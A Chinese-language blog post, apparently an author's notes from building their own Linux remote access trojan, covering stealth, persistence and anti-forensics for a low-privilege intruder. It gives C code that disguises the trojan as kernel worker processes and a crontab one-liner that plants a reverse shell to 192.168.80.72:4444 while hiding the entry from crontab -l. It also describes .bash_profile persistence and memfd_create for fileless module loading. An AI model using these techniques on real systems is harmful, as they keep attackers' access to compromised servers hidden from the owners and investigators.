<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="在开发自己的RAT的过程当中遇到了不少有意思的点，涉及自身的隐藏与反取证。以此记录一下相关的知识点">
<meta property="og:type" content="article">
<meta property="og:title" content="linux下RAT对抗技术">
<meta property="og:url" content="http://yoursite.com/2020/09/17/linux-trick/index.html">
<meta property="og:site_name">
<meta property="og:description" content="在开发自己的RAT的过程当中遇到了不少有意思的点，涉及自身的隐藏与反取证。以此记录一下相关的知识点">
<meta property="article:published_time" content="2020-09-17T06:11:10.000Z">
<meta property="article:modified_time" content="2020-09-18T08:58:55.311Z">
<meta property="article:author" content="ph4ntom">
<meta property="article:tag" content="渗透,后门">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2020/09/17/linux-trick/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>linux下RAT对抗技术 | </title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title"></h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/09/17/linux-trick/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ph4ntom">
      <meta itemprop="description" content="The wheel turns,nothing is ever new">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          linux下RAT对抗技术
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-09-17 14:11:10" itemprop="dateCreated datePublished" datetime="2020-09-17T14:11:10+08:00">2020-09-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-09-18 16:58:55" itemprop="dateModified" datetime="2020-09-18T16:58:55+08:00">2020-09-18</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>在开发自己的RAT的过程当中遇到了不少有意思的点，涉及自身的隐藏与反取证。以此记录一下相关的知识点</p>
<a id="more"></a>


<h1 id="普通用户-非root"><a href="#普通用户-非root" class="headerlink" title="普通用户(非root)"></a>普通用户(非root)</h1><p>大多数的情况下，我们在攻破一台服务器后获得的权限往往都比较低，所以先从普通用户讲起</p>
<h2 id="隐藏"><a href="#隐藏" class="headerlink" title="隐藏"></a>隐藏</h2><p>作为一个RAT，除了提供应该拥有的功能以外，自然最重要的就是要隐藏自身，这里面有一些小trick可以记录</p>
<h3 id="篡改进程名"><a href="#篡改进程名" class="headerlink" title="篡改进程名"></a>篡改进程名</h3><p>经常写c的同志会经常使用这样的main函数<code>int main(int argc, char **args)</code>,其中<code>**args</code>是c程序获取启动参数的方式，我们往往使用的是args[1],arg[2] ……,这些代表了程序获得的第一个参数、第二个参数 ……,但很多人会忽略arg[0]，arg[0]代表的意思就是程序名，而我们在ps里看见的进程名就是arg[0],故而可以在这里做点小文章来帮助隐藏RAT</p>
<p>例如如下代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">static const char * fake_name[] &#x3D; &#123;&quot;[kworker&#x2F;0:2H-kb]\0&quot;,&quot;[kworker&#x2F;0:3H-kb]\0&quot;,&quot;[kblockd&#x2F;3]\0&quot;,&quot;[watchdog&#x2F;0]\0&quot;,&quot;[ksoftirqd&#x2F;1]\0&quot;&#125;;</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">char name_buf[32];</span><br><span class="line"></span><br><span class="line">memset(name_buf,0,sizeof(name_buf));</span><br><span class="line"></span><br><span class="line">strcpy(name_buf,fake_name[give_me_random_num()]); &#x2F;&#x2F;give_me_random_num()生成一个随机值</span><br><span class="line"></span><br><span class="line">util_strcpy(ori_args[0], name_buf); &#x2F;&#x2F;实际上就是覆盖了&#x2F;proc&#x2F;self&#x2F;cmdline</span><br><span class="line"></span><br><span class="line">prctl(PR_SET_NAME, name_buf);  &#x2F;&#x2F;覆盖&#x2F;proc&#x2F;self&#x2F;comm</span><br><span class="line"></span><br><span class="line">.......</span><br></pre></td></tr></table></figure>

<p>通过强制覆盖arg[0],并在我们自己篡改的进程名后添加’\0’来对ps的输出进行强制截断，我们可以使得RAT进程伪装成为内核进程</p>
<p>如果想要骚一点，那么还可以添加一个timer，使得进程名不断变化。</p>
<h2 id="复活"><a href="#复活" class="headerlink" title="复活"></a>复活</h2><p>当RAT被发现并杀死后，为了使得RAT能够重新上线，在普通用户的权限下也有一些操作可以做</p>
<h3 id="修改crontab"><a href="#修改crontab" class="headerlink" title="修改crontab"></a>修改crontab</h3><p>这个玩烂了，而且大家都会去查，所以不多做讨论</p>
<p>不过有个trick还能用用，即</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(crontab -l;printf &quot;*&#x2F;60 * * * * exec 9&lt;&gt; &#x2F;dev&#x2F;tcp&#x2F;192.168.80.72&#x2F;4444;exec 0&lt;&amp;9;exec 1&gt;&amp;9 2&gt;&amp;1;&#x2F;bin&#x2F;bash --noprofile -i;\rno crontab for &#96;whoami&#96;%100c\n&quot;)|crontab -</span><br></pre></td></tr></table></figure>

<p>通过cat命令解析\r，即回到行开头，之后使用%100c生成100个空字符“覆盖”前面的语句，以此使得crontab -l 以及 cat /var/spool/cron/crontabs/xxx 无法看到定时任务</p>
<h3 id="修改或添加-bash-profile"><a href="#修改或添加-bash-profile" class="headerlink" title="修改或添加.bash_profile"></a>修改或添加.bash_profile</h3><p>.bash_profile这个文件当中的命令将会在对应用户登录时执行，只需要在其中加入<code>setsid /xxx/xxx/xxxxx &amp;</code> 就可以保证在用户每一次ssh时，重启RAT</p>
<h2 id="反取证"><a href="#反取证" class="headerlink" title="反取证"></a>反取证</h2><h2 id="dev-shm加载"><a href="#dev-shm加载" class="headerlink" title="/dev/shm加载"></a>/dev/shm加载</h2><p>在RAT的设计中，为了反取证，应将RAT模块化，并使其模块在内存加载，做到除了dropper之外，关键模块不落地</p>
<p>在linux kernel的3.17版本后，在sys/mman.h存在memfd_create函数，此函数可以直接在内存中分配空间，创建虚拟文件，并返回内存中的fd，从而实现模块不落地的功能，并且在/dev/shm下是无法看见这个文件的</p>
<p>在3.17版本之前，也可以用shm_open函数创建虚拟的fd，但是由shm_open函数创建的fd在/dev/shm下是可以用ls看见的</p>
<p>由于linux没有封装memfd_create函数，所以需要以下关键代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">static inline int memfd_create(const char *name, unsigned int flags) &#123;</span><br><span class="line">  return syscall(__NR_memfd_create, name, flags);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过syscall来自行封装此函数</p>
<h1 id="root"><a href="#root" class="headerlink" title="root"></a>root</h1><p>未完待续</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F-%E5%90%8E%E9%97%A8/" rel="tag"># 渗透,后门</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/09/05/linux-fd/" rel="prev" title="linux中的pipe与fd">
      <i class="fa fa-chevron-left"></i> linux中的pipe与fd
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#普通用户-非root"><span class="nav-number">1.</span> <span class="nav-text">普通用户(非root)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#隐藏"><span class="nav-number">1.1.</span> <span class="nav-text">隐藏</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#篡改进程名"><span class="nav-number">1.1.1.</span> <span class="nav-text">篡改进程名</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#复活"><span class="nav-number">1.2.</span> <span class="nav-text">复活</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#修改crontab"><span class="nav-number">1.2.1.</span> <span class="nav-text">修改crontab</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改或添加-bash-profile"><span class="nav-number">1.2.2.</span> <span class="nav-text">修改或添加.bash_profile</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反取证"><span class="nav-number">1.3.</span> <span class="nav-text">反取证</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dev-shm加载"><span class="nav-number">1.4.</span> <span class="nav-text">&#x2F;dev&#x2F;shm加载</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#root"><span class="nav-number">2.</span> <span class="nav-text">root</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ph4ntom</p>
  <div class="site-description" itemprop="description">The wheel turns,nothing is ever new</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ph4ntom</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
